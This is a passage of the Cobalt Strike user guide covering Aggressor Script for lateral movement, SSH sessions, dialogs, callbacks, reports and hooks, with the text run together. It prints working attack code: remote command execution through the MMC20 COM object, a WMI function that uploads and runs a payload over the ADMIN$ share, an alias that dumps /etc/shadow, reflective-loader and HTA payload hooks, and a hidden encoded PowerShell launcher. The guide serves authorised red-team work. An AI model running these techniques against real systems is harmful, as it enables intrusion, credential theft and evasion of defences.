AggressorScript/Beacon [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application", "TARGETHOST")).Document.ActiveView.ExecuteShellCommand ("c:\windows\temp\a.exe", $null, "", "7"); ThiscommandusestheMMC20.ApplicationCOMobjecttoexecuteacommandonaremote target.ThismethodwasdiscoveredasalateralmovementoptionbyMattNelson: https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com- object/ Thisfunctionuses&bpowershelltorunthisPowerShellscript.Thesecondargumentisan emptystringtosuppressthedefaultdownloadcradle(iftheoperatorranpowershell-import previously).Ifyouprefer,youcouldmodifythisexampletouse&bpowerpicktorunthisone-liner withoutpowershell.exe. Thisexampleisoneofthemajormotivatorsformetoaddtheremote-execcommandandAPI toCobaltStrike.Thisisanexcellent"executethiscommand"primitive,butend-to-end weaponization(spawningasession)usuallyincludesusingthisprimitivetorunaPowerShell one-linerontarget.Foralotofreasons,thisisnottherightchoiceinmanyengagements. Exposingthisprimitivethroughtheremote-execinterfacegivesyouachoiceabouthowtobest makeuseofthiscapability(withoutforcingchoicesyoudon'twantmadeforyou). Lateral Movement (Spawn a Session) Beacon'sjumpcommandattemptstospawnanewsessiononaremotetarget.Thiscommand acceptsanexploitname,atarget,andalistener.The&beacon_remote_exploit_registerfunction makesanewmoduleavailabletojump. beacon_remote_exploit_register("wmi", "x86", "Use WMI to run a Beacon payload", lambda(&wmi_remote_spawn, $arch => "x86")); beacon_remote_exploit_register("wmi64", "x64", "Use WMI to run a Beacon payload", lambda(&wmi_remote_spawn, $arch => "x64")); Theabovefunctionsregisterwmiandwmi64optionsforusewiththejumpcommand.The &lambdafunctionmakesacopyof&wmi_remote_spawnandsets$archasastaticvariable scopedtothatfunctioncopy.Usingthismethod,we'reabletousethesamelogictopresenttwo lateralmovementoptionsfromoneimplementation.Here'sthe&wmi_remote_spawnfunction:
$1 = bid, $2 = target, $3 = listener
sub wmi_remote_spawn { local('$name $exedata'); btask($1, "Tasked Beacon to jump to $2 (" . listener_describe($3) . ") via WMI", "T1047"); CobaltStrikeUserGuide www.fortra.com page:207
AggressorScript/SSHSessions
we need a random file name.
$name = rand(@("malware", "evil", "detectme")) . rand(100) . ".exe";
generate an EXE. $arch defined via &lambda when this function was registered with
beacon_remote_exploit_register
$exedata = artifact_payload($3, "exe", $arch);
upload the EXE to our target (directly)
bupload_raw!($1, "\\ $+ $2 $+ \ADMIN$\ $+ $name", $exedata);
execute this via WMI
brun!($1, "wmic /node:" $+ $2 $+ " process call create "\\ $+ $2 $+ \ADMIN$\ $+ $name $+ "");
assume control of our payload (if it's an SMB or TCP Beacon)
beacon_link($1, $2, $3); } The&btaskfunctionfulfillsourobligationtologwhattheuserintendedtodo.TheT1047 argumentassociatesthisactionwithTactic1047inMITRE'sATT&CKmatrix. The&artfiact_payloadfunctiongeneratesastagelessartifacttorunourpayload.Itusesthe ArtifactKithookstogeneratethisfile. The&bupload_rawfunctionuploadstheartifactdatatothetarget.Thisfunctionuses \target\ADMIN$\filename.exetodirectlywritetheEXEtotheremotetargetviaanadmin-only share. &brunrunswmic /node:"target" process call create "\target\ADMIN$\filename.exe"to executethefileontheremotetarget. &beacon_linkassumescontrolofthepayload,ifit'sanSMBorTCPBeacon. SSH Sessions CobaltStrike'sSSHclientspeakstheSMBBeaconprotocolandimplementsasub-setof Beacon'scommandsandfunctions.FromtheperspectiveofAggressorScript,anSSHsession isaBeaconsessionwithfewercommands. What type of session is it? MuchlikeBeaconsessions,SSHsessionshaveanID.CobaltStrikeassociatestasksand metadatawiththisID.The&beaconsfunctionwillalsoreturninformationaboutallCobaltStrike CobaltStrikeUserGuide www.fortra.com page:208
AggressorScript/SSHSessions sessions(SSHsessionsANDBeaconsessions).Usethe-issshpredicatetotestifasessionis anSSHsession.The-isbeaconpredicatetestsifasessionisaBeaconsession. Here'safunctiontofilter&beaconstoSSHsessionsonly: sub ssh_sessions { return map({ if (-isssh $1['id']) { return $1; } else { return $null; } }, beacons()); } Aliases YoumayaddcommandstotheSSHconsolewiththessh_aliaskeyword.Here'sascripttoalias hashdumptograb/etc/shadowifyou'reanadmin. ssh_alias hashdump { if (-isadmin $1) { bshell($1, "cat /etc/shadow"); } else { berror($1, "You're (probably) not an admin"); } } Puttheaboveintoascript,loaditintoCobaltStrike,andtypehashdumpinsideofanSSH console.CobaltStrikewilltabcompleteSSHaliasestoo. Youmayalsousethe&ssh_aliasfunctiontodefineanSSHalias. CobaltStrikepassesthefollowingargumentstoanalias:$0isthealiasnameandarguments withoutanyparsing.$1istheIDofthesessionthealiaswastypedfrom.Thearguments$2and oncontainanindividualargumentpassedtothealias.Thealiasparsersplitsargumentsby spaces.Usersmayuse"doublequotes"togroupwordsintooneargument. YoumayalsoregisteryouraliaseswiththeSSHconsole'shelpsystem.Use&ssh_command_ registertoregisteracommand. Reacting to new SSH Sessions CobaltStrikeUserGuide www.fortra.com page:209
AggressorScript/OtherTopics AggressorScriptsmayreacttonewSSHsessionstoo.Usethessh_initialeventtosetup commandsthatshouldrunwhenaSSHsessionbecomesavailable. on ssh_initial {
do some stuff
} The$1argumenttossh_initialistheIDofthenewsession. Popup Menus YoumayalsoaddontotheSSHpopupmenu.Thesshpopuphookletsyouadditemstothe SSHmenu.TheargumenttotheSSHpopupmenuisanarrayofselectedsessionIDs. popup ssh { item "Run All..." { prompt_text("Which command to run?", "w", lambda({ binput(@ids, "shell $1"); bshell(@ids, $1); }, @ids => $1)); } } You'llnoticethatthisexampleisverysimilartotheexampleusedintheBeaconchapter.For example,Iuse&binputtopublishinputtotheSSHconsole.Iuse&bshelltotasktheSSH sessiontorunacommand.Thisisallcorrect.Remember,internally,anSSHsessionisa BeaconsessionasfarasmostofCobaltStrike/AggressorScriptisconcerned. Other Topics CobaltStrikeoperatorsandscriptscommunicateglobaleventstothesharedeventlog. AggressorScriptsmayrespondtothisinformationtoo.Theeventlogeventsbeginwith event_.Tolistforglobalnotifications,usetheevent_notifyhook. on event_notify { println("I see: $1"); } Topostamessagetothesharedeventlog,usethe&sayfunction. say("Hello World"); CobaltStrikeUserGuide www.fortra.com page:210
AggressorScript/OtherTopics Topostamajoreventornotification(notnecessarilychit-chat),usethe&elogfunction.The deconflictionserverwillautomaticallytimestampandstorethisinformation.Thisinformation willalsoshowupinCobaltStrike'sActivityReport. elog("system shutdown initiated"); Timers Ifyou'dliketoexecuteataskperiodically,thenyoushoulduseoneofAggressorScript'stimer events.Theseeventsareheartbeat_X,whereXis1s,5s,10s,15s,30s,1m,5m,10m,15m,20m, 30m,or60m. on heartbeat_10s { println("I happen every 10 seconds"); } Dialogs AggressorScriptprovidesseveralfunctionstopresentandrequestinformationfromtheuser. Use&show_messagetoprompttheuserwithamessage.Use&show_errortoprompttheuser withanerror. bind Ctrl+M { show_message("I am a message!"); } Use&prompt_texttocreateadialogthataskstheuserfortextinput. prompt_text("What is your name?", "Joe Smith", { show_message("Please $1 $+ , pleased to meet you"); }); The&prompt_confirmfunctionissimilarto&prompt_text,butinsteaditasksayes/noquestion. Custom Dialogs AggressorScripthasanAPItobuildcustomdialogs.&dialogcreatesadialog.Adialogconsists ofrowsandbuttons.Arowisalabel,arowname,aGUIcomponenttotakeinput,andpossiblya helpertosettheinput.Buttonsclosethedialogandtriggeracallbackfunction.Theargumentto CobaltStrikeUserGuide www.fortra.com page:211
AggressorScript/OtherTopics thecallbackfunctionisadictionarymappingeachrow'snametothevalueinitsGUI componentthattakesinput.Use&dialog_showtoshowadialog,onceit'sbuilt. Here'sadialogthatlookslikeSite Management -> Host FilefromCobaltStrike: sub callback { println("Dialog was actioned. Button: $2 Values: $3"); } $dialog = dialog("Host File", %(uri => "/download/file.ext", port => 80, mimetype => "automatic"), &callback); dialog_description($dialog, "Host a file through Cobalt Strike's web server"); drow_file($dialog, "file", "File:"); drow_text($dialog, "uri", "Local URI:"); drow_text($dialog, "host", "Local Host:", 20); drow_text($dialog, "port", "Local Port:"); drow_combobox($dialog, "mimetype", "Mime Type:", @("automatic", "application/octet-stream", "text/html", "text/plain")); dbutton_action($dialog, "Launch"); dbutton_help($dialog, "https://www.cobaltstrike.com/help-host-file"); dialog_show($dialog); Let'swalkthroughthisexample:The&dialogcallcreatestheHost Filedialog.Thesecond parameterto&dialogisadictionarythatsetsdefaultvaluesfortheuri,port,andmimetype rows.Thethirdparameterisareferencetoacallbackfunction.AggressorScriptwillcallthis functionwhentheuserclickstheLaunchbutton.&dialog_descriptionplacesadescriptionatthe topofthedialog.Thisdialoghasfiverows.Thefirstrow,madeby&drow_file,hasthelabel"File:", thename"file",andittakesinputasatextfield.Thereisahelperbuttontochooseafileand populatethetextfield.Theothersrowsareconceptuallysimilar.&dbutton_actionand &dbutton_helpcreatebuttonsthatarecenteredatthebottomofthedialog.&dialog_show showsthedialog. Here'sthedialog: CobaltStrikeUserGuide www.fortra.com page:212
AggressorScript/Callbacks figure75-Ascripteddialog. Callbacks Acallbackisusedtoallowtheusertogetaccesstotheresultanddoadditionalprocessingon theinformation.CobaltStrikeandAggressorScriptusestheconceptofcallbacksbecauseof theasynchronousbehaviorofsendingatasktobeaconandtheresponsebeingreceived sometimeinthefuturebasedonthecurrentsleeptime.Theyarealsousedwhendealingwith customdialogsinordertoperformadditionalactionsbasedoninformationfromthedialog inputandactionbutton. Onceyourasynchronouscallbackisexecutedyoucanthenperformthenecessaryoperations toprocesstheresultforyourusecase.Herearesomeexamplesofwhatyoucandowiththe result: l FormattheresultbeforedisplayingintheBeaconConsole l Scantheresultforinformationtotriggersomeadditionaltask l Savetheinformationtoafile Acallbackfunctionwillhaveargumentsandinmostcaseswillhavethesamearguments, howevertherearesomeexceptions.Youshouldalwaysrefertotheaggressorscriptfunction documentationtounderstandwhatargumentsarebeingpassedtoyourcallback. Callback Request and Response Processing Thefollowingdescribesatahighlevelwhatgoesonwhenacallbackisusedinanaggressor scriptcommand. CobaltStrikeUserGuide www.fortra.com page:213
AggressorScript/Callbacks
l Theclientexecutesanaggressorscriptcommandwithacallback
o Arequestiscreatedandsavedinaqueuetoberetrievedlater
o Therequestissenttotheteamserver
l Theteamserverreceivestherequest
o Therequestissavedinaqueuetoberetrievedlater
o Therequestissenttoabeacon
l TheBeaconreceivestherequestandprocessesthetask
o Aresponseisgeneratedandsenttotheteamserver
l Theteamserverreceivestheresponse
o Therequestisretrievedfrom theteamserverqueueusinganidfrom theresponse
o Areplyisgeneratedandsenttotheoriginatingclient
l Theoriginatingclientreceivestheresponse
o Therequestisretrievedfrom theclientqueueusinganidfrom theresponse
o Theclientwillexecutethecallback
Boththeclientandteamserversaverequeststhathaveassociatedcallbacksinaqueue.A
requestiseventuallyremovedinordertomaintainthenumberofrequestinthequeue.A
requestisremovedwhenthesetwoconditionsoccur.
Thefirstconditioniswhentheoriginatingclientdisconnectsfromtheteamserver.Whenthis
happensthequeuemanagedbytheclientisremovedasthequeueisperteamserver
connection.Thequeueontheteamserverwillseetheoriginatingclienthasdisconnectedand
flaganyrequestsforthatclienttoberemoved.Thismeanstheoriginatingclientneedstostay
connectedtotheteamserveruntilthecommandwithacallbackhascompleted.Otherwise,any
responsesfromBeaconafteradisconnectionfromtheoriginatingclientwillbelost.
Thesecondconditioniswhenthereisnoresponsesforarequestafteraperiodoftime.There
aretwotimeoutsettingsthatdetermineifarequestshouldberemoved.Thefirstsettingisthe
limits.callback_max_timeoutwhichdefaultsto1day,whichisusedtowaitfortheinitial
response.Thesecondsettingisthelimits.callback_keep_timeoutwhichdefaultsto1hour,
whichisusedtowaitforsubsequentresponses.Thesesettingscanbemodifiedbyupdating
theTeamServer.propfile.Inmostusecasesthedefaultsshouldbefine,howeverifyoucreatea
commandthatisalong-runningjob/taskthenthesesettingsmayneedtobeadjusted.The
adjustedsettingsneedtobebasedonhowoftendatawillbereceived,whichneedstoaccount
forbeacon'ssleeptimeandhowoftenthejob/tasksendsdata.
Ifyouseeerror(s)likethefollowingintheteamserverconsolewindowthenthiscanindicatethe
settingsneedtobeadjustedortheoriginatingclienthasdisconnectedfromtheteamserver.
"Callback #/# has no pending request"
CobaltStrikeUserGuide www.fortra.com page:214
AggressorScript/Callbacks TheTeamServer.propfileisnotincludedintheCobaltStrikedistribution.Thecurrentdefault filecanbefoundonGithub(https://github.com/Cobalt-Strike/teamserver-prop). Callback Implementation Aggressorscriptcallbackscanbeimplementedusingafewdifferenttechniquesandinmany casesthetechniqueusedisbasedonpersonalpreference.Therearesomeusecaseswhere youwillwanttochooseaparticulartechniqueinordertoaccomplishthetask.Thefollowing typeoftechniquescanbeusedfollowedbysimplesnippetsofcode: l AnonymousClosure l NamedClosure l LambdaClosure Examplesofaggressorscriptfunctionsthatsupporttheuseofacallbackfunctioncanbefound onGithub(https://github.com/Cobalt-Strike/callback_examples). AnonymousClosureExample Ananonymousclosureisusefulwhenyouhaveasmallamountofcodethatcanbekeptinline withthecaller.Inthisexampletheclosureisexecutedinthefuturewhendataisreturnedfroma BOF,whichsimplylogstheoutputtothebeaconconsole. alias cs_example {
User setup code removed for brevity
beacon_inline_execute($bid, $data, "go", $args, { blog($1, $2); });
}
Named ClosureExample
Anamedclosureisusefulwhenyouhavealotofcodeandmaywanttoreusethecodewith
otheraggressorfunctions.Inthisexampletheclosurenamedbof_cbisexecutedinthefuture
whendataisreturnedfromaBOF.
$1 - bid, $2 - result, $3 - info map
sub bof_cb {
User defined code removed for brevity
} alias cs_example { local('$bid $data $args');
User setup code removed for brevity
beacon_inline_execute($bid, $data, "go", $args, &bof_cb)); } CobaltStrikeUserGuide www.fortra.com page:215
AggressorScript/CustomReports Lambda ClosureExample Alambdaclosureisusefulwhenyouwanttopassvariable(s)thatwouldnotbeinscopeusing thepreviousmethods.Thisexampleshowshowyoucangetaccesstothe$test_numvariable whichisinthescopeofthecs_examplealias.
$1 - bid, $2 - result, $3 - info map, $4 - test_num
sub bof_cb {
User defined code removed for brevity
} alias cs_example { local('$bid $file $test_num');
User setup code removed for brevity
binline_execute($bid, $file, $test_num, lambda({ bof_cb ($1, $2, $3, $test_num); }, $test_num); } Custom Reports CobaltStrikeusesadomain-specificlanguagetodefineitsreports.Thislanguageissimilarto AggressorScriptbutdoesnothaveaccesstomostofitsAPIs.Thereportgenerationprocess happensinitsownscriptengineisolatedfromyourclient. ThereportscriptenginehasaccesstoadataaggregationAPIandafewprimitivestospecify thestructureofaCobaltStrikereport. Thedefault.rptfiledefinesthedefaultreportsinCobaltStrike. Loading Reports GotoCobalt Strike->Preferences->Reportstoloadacustomreport.PresstheFoldericon andselecta.rptfile.PressSave.YoushouldnowseeyourcustomreportundertheReporting menuinCobaltStrike. CobaltStrikeUserGuide www.fortra.com page:216
AggressorScript/CustomReports figure76-Loadareportfilehere. Report Errors IfCobaltStrikehadtroublewithyourreport(e.g.,asyntaxerror,runtimeerror,etc.)thiswillshow upinthescriptconsole.GotoView->Script Consoletoseethesemessages. "Hello World"Report Here'sasimple"HelloWorld"report.Thisreportdoesn'trepresentanythingspecial.Itmerely showshowtogetstartedwithacustomreport.
default description of our report [the user can change this].
describe("Hello Report", "This is a test report.");
define the Hello Report
report "Hello Report" {
the first page is the cover page of our report.
page "first" {
title heading
h1($1['long']);
today's date/time in an italicized format
ts();
a paragraph [could be the default...
p($1['description']); }
this is the rest of the report
CobaltStrikeUserGuide www.fortra.com page:217
AggressorScript/CompatibilityGuide page "rest" {
hello world paragraph
p("Hello World!"); } } AggressorScriptdefinesnewreportswiththereportkeywordfollowedbyareportnameanda blockofcode.Usethepagekeywordwithinareportblocktodefinewhichpagetemplatetouse. Contentforapagetemplatemayspanmultiplepages.Thefirstpagetemplateisthecoverof CobaltStrike'sreports.Thisexampleuses&h1toprintatitleheading.The&tsfunctionprintsa date/timestampforthereport.Andthe&pfunctionprintsaparagraph. The&describefunctionsetsadefaultdescriptionofthereport.Theusermayeditthiswhenthey generatethereport.Thisinformationispassedtothereportaspartofthereportmetadatain the$1parameter.The$1parameterisadictionarywithinformationabouttheuser's preferencesforthereport. Data Aggregation API CobaltStrikeReportsdependontheDataAggregationAPItosourcetheirinformation.ThisAPI providesyouamergedviewofdatafromallteamserver'syourclientiscurrentlyconnectedto. TheDataAggregationAPIallowsreportstoprovideacomprehensivereportoftheassessment activities.Thesefunctionsbeginwiththeagprefix(e.g.,&agTargets).Thereportenginepasses adataaggregatemodelwhenitgeneratesareport.Thismodelisthe$3parameter. Compatibility Guide ThispagedocumentsCobaltStrikechangesversion-to-versionthatmayaffectcompatability withyourcurrentAggressorScripts.Ingeneral,it'sourgoalthatascriptwrittenforCobaltStrike 3.0isforward-compatiblewithfuture3.xreleases.Majorproductreleases(e.g.,3.0->4.0)do giveussomelicensetorevisitAPIsandbreaksomeofthiscompatability.Sometimes,a compatabilitybreakingAPIchangeisinevitable.Thesechangesaredocumentedhere. Cobalt Strike 4.x
- CobaltStrike4.xmademajorchangestoCobaltStrike'slistenermanagementsystems. Thesechangesincludednamechangesforseveralpayloads.Scriptsthatanalyzethe listenerpayloadnameshouldnotethesechanges: l windows/beacon_smb/bind_pipeisnowwindows/beacon_bind_pipe l windows/beacon_tcp/bind_tcpisnowwindows/beacon_bind_tcp CobaltStrikeUserGuide www.fortra.com page:218
AggressorScript/CompatibilityGuide 2. CobaltStrike4.xmovesawayfrom payloadstagers.Stagelesspayloadsarepreferredin allpost-exworkflows.Wherestagelessisn'tpossible;useanexplicitstagerthatworks withallpayloads. Thejump psexec_pshlateralmovementattackisagoodexampleoftheabove.This automationgeneratesabind_pipestagertofitwithinthesizeconstraintsofa PowerShellone-liner.Allpayloadsaresentthroughthisstagingprocess;regardlessof theirconfiguration. Thisconventionchangewillbreaksomeprivilegeescalationscriptsthatfollowthepre- 4.xpatternsintheElevateKit.&bstageisnowgoneasitsunderlyingfunctionalitywas changedtoomuchtoincludeinCobaltStrike4.x.Wherepossible,privilegeescalation scriptsshoulduse&payloadtoexportapayload,runitviathetechnique,anduse &beacon_linktoconnecttothepayload.Ifastagerisrequired;use&stager_bind_tcpto exportaTCPstagerand&beacon_stage_tcptostageapayloadthroughthisstager. 3. CobaltStrike4.xremovesthefollowingAggressorScriptfunctions: Function Replacement Reason &bbypassuac &belevate &belevateisthepreferredfunctiontospawnan elevatedsessiononthelocalsystem &bpsexec_psh &bjump &bjumpisthepreferredfunctiontospawna sessiononaremotetarget &brunasadmin &belevate_ runasadminwasexpandedtoallowmultiple command optionstorunacommandinanelevated context &bstage multiple &bstagewouldstageANDlinkwhenneeded. functions Bindstagingisnowexplicitwith&beacon_ stage_tcpor&beacon_stage_pipe.&beacon_ linkisthegeneral"linktothislistener"step. &bwdigest &bmimikatz Use&bmimikatztorunthiscommand...ifyou reallywantto.:) &bwinrm &bjump,winrm &bjumpisthepreferredfunctiontospawna orwinrm64 sessiononaremotetarget &bwmi NostagelessWMIlateralmovementoption existsinCS4.x 4. CobaltStrike4.xdeprecatesthefollowingAggressorScriptfunctions: CobaltStrikeUserGuide www.fortra.com page:219
AggressorScript/Hooks Function Replacement Reason &artifact &artifact_stager Consistentarguments;consistentnaming convetion &artifact_ &artifact_ Consistentnaming;noneedforacallbackin stageless payload CobaltStrike4.x &drow_ Proxyconfigisnowtiedtothelistenerandnot proxyserver neededwhenexportingapayloadstage. &drow_listener_ &drow_listener_ Thesefunctionsarenowequivalentto smb stage eachother &listener_create &listener_create_ Alotmoreoptionsrequiredachangeinhow ext argumentsarepassed &powershell &powershell_ Consistency;de-emphasisonPowerShellone- command, linersinAPI &artifact_stager &powershell_ &powershell_ Clearernaming. encode_oneliner command &powershell_ &powershell_ Consistency;clearerseparationofpartsinAPI encode_stager command, &artifact_general &shellcode &stager Consistentarguments;consistentnaming Hooks HooksallowAggressorScripttointerceptandchangeCobaltStrikebehavior. APPLET_SHELLCODE_FORMAT Formatshellcodebeforeit'splacedontheHTMLpagegeneratedtoservetheSignedorSmart AppletAttacks.SeeUser-driven Web Drive-by Attacks on page 79. AppletKit ThishookisdemonstratedintheAppletKit.TheAppletKitisavailableviatheCobaltStrike Arsenal(Help->Arsenal). CobaltStrikeUserGuide www.fortra.com page:220
AggressorScript/Hooks Example set APPLET_SHELLCODE_FORMAT { return base64_encode($1); } BEACON_RDLL_GENERATE HooktoallowuserstoreplacetheCobaltStrikereflectiveloaderinabeaconwithaUserDefined ReflectiveLoader.Thereflectiveloadercanbeextractedfromacompiledobjectfileand pluggedintotheBeaconPayloadDLL.SeeUser Defined Reflective DLL Loader on page 164. Arguments $1-Beaconpayloadfilename $2-Beaconpayload(dllbinary) $3-Beaconarchitecture(x86/x64) Returns TheBeaconexecutablepayloadupdatedwiththeUserDefinedreflectiveloader.Return$nullto usethedefaultBeaconexecutablepayload. Example sub generate_my_dll { local('$handle $data $loader $temp_dll');
---------------------------------------------------------------------
Load an Object File that contains a Reflective Loader.
The architecture ($3) is used in the path.
---------------------------------------------------------------------
$handle = openf("/mystuff/Refloaders/bin/MyReflectiveLoader. $+ $3 $+
.o"); $handle = openf("mystuff/Refloaders/bin/MyReflectiveLoader. $+ $3 $+ .o"); $data = readb($handle, -1); closef($handle);
warn("Object File Length: " . strlen($data));
CobaltStrikeUserGuide www.fortra.com page:221
AggressorScript/Hooks if (strlen($data) eq 0) { warn("Error loading reflective loader object file."); return $null; }
---------------------------------------------------------------------
extract loader from BOF.
---------------------------------------------------------------------
$loader = extract_reflective_loader($data);
warn("Reflective Loader Length: " . strlen($loader));
if (strlen($loader) eq 0) { warn("Error extracting reflective loader."); return $null; }
---------------------------------------------------------------------
Replace the beacons default reflective loader with '$loader'.
---------------------------------------------------------------------
$temp_dll = setup_reflective_loader($2, $loader);
---------------------------------------------------------------------
TODO: Additional Customization of the PE...
- Use 'pedump' function to get information for the updated DLL.
- Use these convenience functions to perform transformations on the DLL:
pe_remove_rich_header
pe_insert_rich_header
pe_set_compile_time_with_long
pe_set_compile_time_with_string
pe_set_export_name
pe_update_checksum
- Use these basic functions to perform transformations on the DLL:
pe_mask
pe_mask_section
pe_mask_string
pe_patch_code
pe_set_string
pe_set_stringz
pe_set_long
pe_set_short
pe_set_value_at
pe_stomp
---------------------------------------------------------------------
---------------------------------------------------------------------
Give back the updated beacon DLL.
---------------------------------------------------------------------
CobaltStrikeUserGuide www.fortra.com page:222
AggressorScript/Hooks return $temp_dll; }
------------------------------------
$1 = DLL file name
$2 = DLL content
$3 = arch
------------------------------------
set BEACON_RDLL_GENERATE { warn("Running 'BEACON_RDLL_GENERATE' for DLL " . $1 . " with architecture " . $3); return generate_my_dll($1, $2, $3); } BEACON_RDLL_GENERATE_LOCAL TheBEACON_RDLL_GENERATE_LOCALhookisverysimilartoBEACON_RDLL_GENERATEwith additionalarguments. Arguments $1-Beaconpayloadfilename $2-Beaconpayload(dllbinary) $3-Beaconarchitecture(x86/x64) $4-ParentbeaconID $5-GetModuleHandleApointer $6-GetProcAddresspointer Example
------------------------------------
$1 = DLL file name
$2 = DLL content
$3 = arch
$4 = parent Beacon ID
$5 = GetModuleHandleA pointer
$6 = GetProcAddress pointer
------------------------------------
set BEACON_RDLL_GENERATE_LOCAL { warn("Running 'BEACON_RDLL_GENERATE_LOCAL' for DLL " . CobaltStrikeUserGuide www.fortra.com page:223
AggressorScript/Hooks $1 ." with architecture " . $3 . " Beacon ID " . $4 . " GetModuleHandleA " $5 . " GetProcAddress " . $6); return generate_my_dll($1, $2, $3); } AlsoSee BEACON_RDLL_GENERATE on page 221 BEACON_RDLL_SIZE TheBEACON_RDLL_SIZEhookallowstheuseofbeaconswithmorespacereservedforUser DefinedReflectiveloaders.ThealternatebeaconsareusedintheBEACON_RDLL_GENERATE andBEACON_RDLL_GENERATE_LOCALhooks.Theoriginal/defaultspacereservedfor reflectiveloadersis5KB.Thehookalsoallowstheentirereflectiveloaderspacetoberemoved. Overridingthissettingwillgeneratebeaconsthataretoolargefortheplaceholdersinstandard artifacts.Itisverylikelytorequirecustomizedchangesinanartifactkittoexpandreserved payloadspace.SeethedocumentationintheartifactkitprovidedbyCobaltStrike. Customized"stagesize"settingsaredocumentedin"build.sh"and"script.example".SeeUser Defined Reflective DLL Loader on page 164. Arguments $1-Beaconpayloadfilename $2-Beaconarchitecture(x86/x64) Returns ThesizeinKBfortheReflectiveLoaderreservedspaceinbeacons.Validvaluesare"0","5","100". "0"usesbeaconswithoutthereservedspacesforreflectiveloaders. "5"isthedefaultandusesstandardbeaconswith5KBreservedspaceforreflectiveloaders. "100"useslargerbeaconswith100KBreservedspaceforreflectiveloaders. Example
------------------------------------
$1 = DLL file name
CobaltStrikeUserGuide www.fortra.com page:224
AggressorScript/Hooks
$2 = arch
------------------------------------
set BEACON_RDLL_SIZE { warn("Running 'BEACON_RDLL_SIZE' for DLL " . $1 . " with architecture " . $2); return "100"; } BEACON_SLEEP_MASK UpdateaBeaconpayloadwithaUserDefinedSleepMask Arguments $1-beacontype(default,pivot) $2-arch SleepMaskKit ThishookisdemonstratedintheThe Sleep Mask Kit on page 92. EXECUTABLE_ARTIFACT_GENERATOR ControltheEXEandDLLgenerationforCobaltStrike. Arguments $1-theartifactfile(e.g.,artifact32.exe) $2-shellcodetoembedintoanEXEorDLL ArtifactKit ThishookisdemonstratedintheThe Artifact Kit on page 89. HTMLAPP_EXE ControlsthecontentoftheHTMLApplicationUser-driven(EXEOutput)generatedbyCobalt Strike. Arguments CobaltStrikeUserGuide www.fortra.com page:225
AggressorScript/Hooks $1-theEXEdata $2-thenameofthe.exe ResourceKit ThishookisdemonstratedintheThe Resource Kit on page 92. Example set HTMLAPP_EXE { local('$handle $data'); $handle = openf(script_resource("template.exe.hta")); $data = readb($handle, -1); osef($handle); $data = strrep($data, '##EXE##', transform($1, "hex")); $data = strrep($data, '##NAME##', $2); return $data; } HTMLAPP_POWERSHELL ControlsthecontentoftheHTMLApplicationUser-driven(PowerShellOutput)generatedby CobaltStrike. Arguments $1-thePowerShellcommandtorun ResourceKit ThishookisdemonstratedintheThe Resource Kit on page 92. Example set HTMLAPP_POWERSHELL { local('$handle $data'); $handle = openf(script_resource("template.psh.hta")); $data = readb($handle, -1); closef($handle); CobaltStrikeUserGuide www.fortra.com page:226
AggressorScript/Hooks
push our command into the script
return strrep($data, "%%DATA%%", $1); } LISTENER_MAX_RETRY_STRATEGIES Returnastringthatcontainsthelistofdefinitionswhichisseparatedwitha'\n'character.The definitionneedstomatchasyntaxofexit-[max_attempts]-[increase_attempts]- [duration][m,h,d]. Forexampleexit-10-5-5mwillexitbeaconafter10failedattemptsandwillincreasesleep timeafterfivefailedattemptsto5minutes.Thesleeptimewillnotbeupdatedifthecurrent sleeptimeisgreaterthanthespecifieddurationvalue.Thesleeptimewillbeaffectedbythe currentjittervalue.Onasuccessfulconnectionthefailedattemptscountwillberesettozero andthesleeptimewillberesettothepriorvalue. Return$nulltousethedefaultlist. Example
Use a hard coded list of strategies
set LISTENER_MAX_RETRY_STRATEGIES { local('$out'); $out .= "exit-50-25-5m\n"; $out .= "exit-100-25-5m\n"; $out .= "exit-50-25-15m\n"; $out .= "exit-100-25-15m\n"; return $out; }
Use loops to build a list of strategies
set LISTENER_MAX_RETRY_STRATEGIES { local('$out'); @attempts = @(50, 100); @durations = @("5m", "15m"); $increase = 25; foreach $attempt (@attempts) { foreach $duration (@durations) CobaltStrikeUserGuide www.fortra.com page:227
AggressorScript/Hooks { $out .= "exit $+ - $+ $attempt $+ - $+ $increase $+ - $+ $duration\n"; } } return $out; } POSTEX_RDLL_GENERATE HooktoallowuserstoreplacetheCobaltStrikereflectiveloaderforpost-exwithaUserDefined ReflectiveLoader.SeePost-ex User Defined Reflective DLL Loader on page 163. ThePost-exDLLpassedasargument2doesnotcontainanyreflectiveloader.Youdonotneed toremoveanexistingreflectiveloaderfromtheDLL. Arguments $1–Post-expayloadfilename $2–Post-expayload(dllbinary) $3–Post-exarchitecture(x86/x64) $4–parentBeaconID $5–GetModuleHandlepointer $6–GetProcAddresspointer Returns ThePost-expayloadupdatedwiththeUserDefinedreflectiveloader.Return$nulltousethe defaultPost-expayloadandloader. Example
------------------------------------
$1 = DLL file name
$2 = DLL content
$3 = arch
$4 = parent Beacon ID
$5 = GetModuleHandle pointer
CobaltStrikeUserGuide www.fortra.com page:228
AggressorScript/Hooks
$6 = GetProcAddress pointer
------------------------------------
set POSTEX_RDLL_GENERATE {
local('arch postex $file_handle $ldr $loader_path $payload');
$postex = $2;
$arch = $3;
warn("Running 'POSTEX_RDLL_GENERATE' for DLL " .
$1 ." with architecture " . $3 . " Beacon ID " . $4 . " .
GetModuleHandleA “ .
$5 . " GetProcAddress " . $6);
Read the UDRL from the supplied binary file
$loader_path = "mystuff/Refloaders/bin/MyPostExReflectiveLoader. $+ $arch $+ .o"; $file_handle = openf($loader_path); $ldr = readb($file_handle, -1); closef($file_handle); if (strlen($ldr) == 0) { warn("Error: Failed to read $loader_path"); return $null; }
Prepend UDRL (sRDI/Double Pulsar type) to Post-ex DLL and output
the modified payload. $payload = $ldr . $postex; print_info("Payload Size: " . strlen($payload)); return $payload; } POWERSHELL_COMMAND ChangetheformofthepowershellcomamndrunbyCobaltStrike'sautomation.Thisaffects jumppsexec_psh,powershell,and[host]->Access->One-liner. Arguments $1-thePowerShellcommandtorun. $2-true|falsethecommandisrunonaremotetarget. ResourceKit ThishookisdemonstratedintheThe Resource Kit on page 92. Example CobaltStrikeUserGuide www.fortra.com page:229
AggressorScript/Hooks set POWERSHELL_COMMAND { local('$script'); $script = transform($1, "powershell-base64");
remote command (e.g., jump psexec_psh)
if ($2) { return "powershell -nop -w hidden -encodedcommand $script"; }
local command
